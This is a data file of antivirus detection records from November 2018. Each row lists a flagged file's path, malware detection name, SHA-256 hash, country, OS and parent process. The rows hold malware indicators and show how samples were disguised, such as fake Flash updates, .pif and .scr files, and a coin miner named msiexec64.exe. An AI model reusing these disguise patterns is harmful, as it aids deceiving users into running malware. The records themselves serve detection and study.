  Row(detection=Row(filename='avscan-20181102-055807-3d78ffdc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055807-3D78FFDC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055436-bfd01b80', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055436-BFD01B80', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060105-a7d78ce5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060105-A7D78CE5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055422-b77e832e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055422-B77E832E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051239-e3e62905', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051239-E3E62905', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050816-46a8d7f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050816-46A8D7F9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060931-d57b4f29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060931-D57B4F29', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T03:05:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050538-e8c8fb7a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050538-E8C8FB7A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060938-d9ac332e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060938-D9AC332E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050649-12da367c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050649-12DA367C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051347-0be05566', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051347-0BE05566', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052543-b6d8125c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052543-B6D8125C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T11:01:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055824-4805cf45', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055824-4805CF45', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T17:00:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054405-47ec5069', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054405-47EC5069', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055707-1a0516c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055707-1A0516C9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kuuls.exe', filepath='D:\\KUULS.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T14:35:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:15:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T06:48:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T01:27:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe617_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe617 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T15:04:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='prosedur lpa.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\prosedur LPA\\prosedur LPA\\prosedur LPA.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unwise.exe', filepath='C:\\Transtool\\Unwise.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='085055e90c76f7bcfbc46a1295c53fcb58ab0a1953ac7fe118c7261314a6d766', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T06:50:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:59:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='list uu.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\DINI\\LPA\\PERSIAPAN AUDIT\\LIST UU\\LIST UU.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155908-e16b24cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155908-E16B24CB', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:59:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wspsetup.exe', filepath='C:\\Users\\X\\Downloads\\wspsetup.exe', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3231232, timestamp='2018-11-01T13:20:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-00-47-50.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T01:07:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ucrit.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Ucrit\\Ucrit.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:26:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='danh sách cán bộ chiến sĩ đội csđt.exe', filepath='H:\\\xa0\\Chuyen an ĐB718\\DANH SÁCH CÁN BỘ CHIẾN SĨ ĐỘI CSĐT.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='2746d627a74abb289fe81c0d6089d3ba15a83f056059d2030f5a76ec124a69db', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:29:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:43:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='noteicon.exe', filepath='C:\\Program Files\\IObit\\IObit Uninstaller\\NoteIcon.exe', filesize=116000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='0121252491e1b22093a267ad3ccb52b8ffcd503dc00e8b0019523f4e131da1a6', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:TkbRpJqjzE695tHL.1', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-01T21:43:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155819-d91de2ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155819-D91DE2AD', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:58:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='leadership.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PROPOSAL LPA\\LPA LEADERSHIP\\LEADERSHIP.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:29:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142128-181a6e96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bb904b13\\AVSCAN-20181101-142038-0F245C50\\AVSCAN-20181101-142128-181A6E96', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:21:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-092454-4c057260', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_92d4ac87\\AVSCAN-20181101-092438-4A238393\\AVSCAN-20181101-092454-4C057260', filesize=576000, name='TR/Miner.syyzh.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:24:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='c:\\users\\X\\documents\\all miner\\multipoolminer\\bin\\equihash-ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:14:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='taskeng.exe', filepath='C:\\Windows\\System32\\taskeng.exe', filesize=192000, name='TR/Patched.Gen.#M300.#R2947'), hash='baae1a15dd2715e61d17b9832c85d3fe77674867157c467655041e945908fee4', metadata=Row(cmdline='\\\\\\/registry=\\\\\\"hkey_local_machine\\\\\\\\software\\\\\\\\reimage\\\\\\\\reimage protector\\\\\\" \\\\\\/task=Scan', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Reimage\\Reimage Protector\\ReiScanner.exe', parentsize=7086960, timestamp='2018-11-01T07:48:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpl.exe', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 7.3.4\\start\\en-US\\tpl\\tpl.exe', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='com.linkedin.android.exe', filepath='G:\\Android\\data\\com.linkedin.android.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:54:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='AZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:40:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\nhm_windows_1.9.0.4 (1)\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:EXt62XVEJUC95XaB.1', country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:22:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123702-90c1bff9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123642-7FF2C2DB\\AVSCAN-20181101-123702-90C1BFF9', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:37:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='documents.exe', filepath='C:\\Users\\X\\Documents\\Documents.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T07:36:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='117682-renault-clio-3-gtasa.exe', filepath='C:\\Users\\X\\Desktop\\транспорт для GTA SA\\машины\\117682-renault-clio-3-gtasa.exe', filesize=15684000, name='PUA/GameModding.Gen.#M300.#R6944'), hash='e64700b002769bf2307dae4ac792df097cdc62c658a3416a0981d8fac43b2ab8', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T05:53:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\Canon Network Tool\\msIExEc64.ExE', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T05:26:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tools images.scr', filepath='C:\\Users\\X\\Documents\\Daemon Tools Images\\Tools Images.scr', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-164826-bf3f29b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9a412ece\\AVSCAN-20181101-164342-8EC7121A\\AVSCAN-20181101-164826-BF3F29B3', filesize=64000, name='HEUR/AGEN.1015942.#M1.#R1'), hash='d483d928ef7a84d730fef3153a974065a8dfb684a06b40da645b9d103ab29e19', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:48:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210050-862fc5ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c35755c0\\AVSCAN-20181101-205617-602DFCFE\\AVSCAN-20181101-210050-862FC5EC', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='cd2a73795bcd963999c929a1ad3f17695eb7e5773effdc96473fca2dc8cc20de', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:56Z'), dt=datetime.date(2018, 11, 1)),
